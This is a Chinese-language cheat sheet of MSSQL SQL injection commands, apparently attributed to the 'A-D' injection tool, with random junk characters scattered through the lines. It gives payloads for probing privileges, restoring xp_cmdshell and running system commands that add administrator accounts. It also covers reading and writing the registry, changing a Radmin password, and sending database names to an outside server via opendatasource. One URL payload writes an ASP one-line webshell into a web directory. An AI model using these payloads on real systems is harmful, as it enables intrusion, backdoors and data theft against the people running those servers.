阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
//看看是什么权限的
% `/ y  U' Y/ S$ n! dand 1=(Select IS_MEMBER('db_owner'))
4 n. H4 B4 E) Z- }$ Q# jAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
' z" {+ j; u# E8 u$ Z5 k! z* I3 n
* X3 a% d/ _8 ?& ]( G//检测是否有读取某数据库的权限
( D1 v# a! w  iand 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
0 [0 M& m$ G' j- d# p+ I
, v) `4 ~8 k" \7 _* h% [$ N& @% Y
- A6 k# M: E0 B9 u% d5 u; w1 B数字类型
and char(124)%2Buser%2Bchar(124)=0
) w3 _- D" M; ^- g  }
字符类型
* [0 c, x, y5 _1 K1 |% c' and char(124)%2Buser%2Bchar(124)=0 and ''='
! s3 a$ U+ _, @* F8 Y1 P+ C
0 ]. z0 |: w+ @) Q+ [. a" f+ ~搜索类型
  ?; }, Q; Y& l' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
' [0 R/ P: X, ~4 A" Dand user>0
6 S$ ~. Q7 j7 u. W# d' and user>0 and ''='
9 P& J) T8 m6 q. @0 q7 W
+ b) ?$ _" d1 Z7 i( S. [- R检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
3 Y' o* h. c# k) U) ~- o4 {And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

1 v, X; ]3 _- }; D检测是不是MSSQL数据库
and exists (select * from sysobjects);--
9 ]% J* p  e' d- E" j3 q
检测是否支持多行
) e, `" k. P  O% k1 s;declare @d int;--

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
0 b0 @$ c9 Z4 S7 N! m

; o. p3 u$ h7 s- B% Q# Tselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

0 y) Q4 \/ |7 ]# O: U1 X1 p//-----------------------
//      执行命令
# v* r( v  z- {3 L6 M" ^) d# a/ }//-----------------------
首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
/ q( S4 r4 B8 |1 T# N
$ X6 q% w* s7 m+ e' A) ?然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

2 \: L# n8 f9 e3 \& s执行命令
' e3 ], w5 I9 b1 A. k* g* B, Y, P;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
: t" s4 R5 p; @+ g- U% k- f
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
! [1 G3 M8 h4 S8 rhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
9 O8 @( ?7 k. k4 B
3 u) y) E6 B: X6 ]4 o写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ

读注册表
- e( i$ s- z$ O2 [% Rexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
- R; t, C' a' N; X2 s% W: [
读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1
. P( w% ~# h% P- d1 z

4 k, K& R! u) L数据库备份
backup database pubs to disk = 'c:\123.bak'
/ q( y+ P* E! v1 Y6 l: k& L
4 j) j; X, z) G# J/ z//爆出长度
. d. ]7 x7 }. ^# o" |) pAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
, B. G( K2 ^% n9 Y1 {
3 b) [! _; a; ?7 J
4 L# q2 [& z3 W4 y; K
: L3 L) l% B/ K$ H5 r( W更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'
, ?" O6 B$ r. Y" @; o  h
添加和删除一个SA权限的用户test：
1 i/ P9 h$ a" V. @; I. iexec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
1 o8 H% s5 {+ y9 r% u
删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public


停掉或激活某个服务。

/ _) \, r! L( i3 u$ D0 D- Texec master..xp_servicecontrol 'stop','schedule'
9 o: u6 Q7 q7 b$ G! Xexec master..xp_servicecontrol 'start','schedule'
% f. N9 b7 z- d" D8 a
dbo.xp_subdirs
; ]8 f8 B( y8 E5 o* Q: |
只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

9 L; _1 A* U- r/ u9 ?1 l, D: @dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
6 |/ X0 O# `* V7 W+ g$ [0 `6 A/ a'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

3 }# J2 j# h/ X停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
. U$ \" j+ ?- A: d  D( ^
xp_terminate_process 2484

+ s" A4 @9 B! v% A% Yxp_unpackcab

+ O1 [2 D- k' i: n% H解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1
* _- {4 x. M, ]9 y! Q, d$ l: q. ~
( N3 f& M' Y5 T- G. F& U" P
某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

- B" ]5 L$ E% }create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);
. w$ g8 ?# x7 v+ _" w
9 K% L+ h1 y6 V9 @  ], b//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases
! k2 ?$ c  `, G. r8 @+ j" x

//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
; f, E  K- V. w  R3 y! O2 e4 K
8 b8 C( x& u; X5 y6 i/ g$ O用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表内容
Update films SET kind = 'Dramatic' Where id = 123
  q9 l3 l: G$ ~+ n- w( ~4 c
//删除内容
8 p3 o. N! R6 x: }delete from table_name where Stockid = 3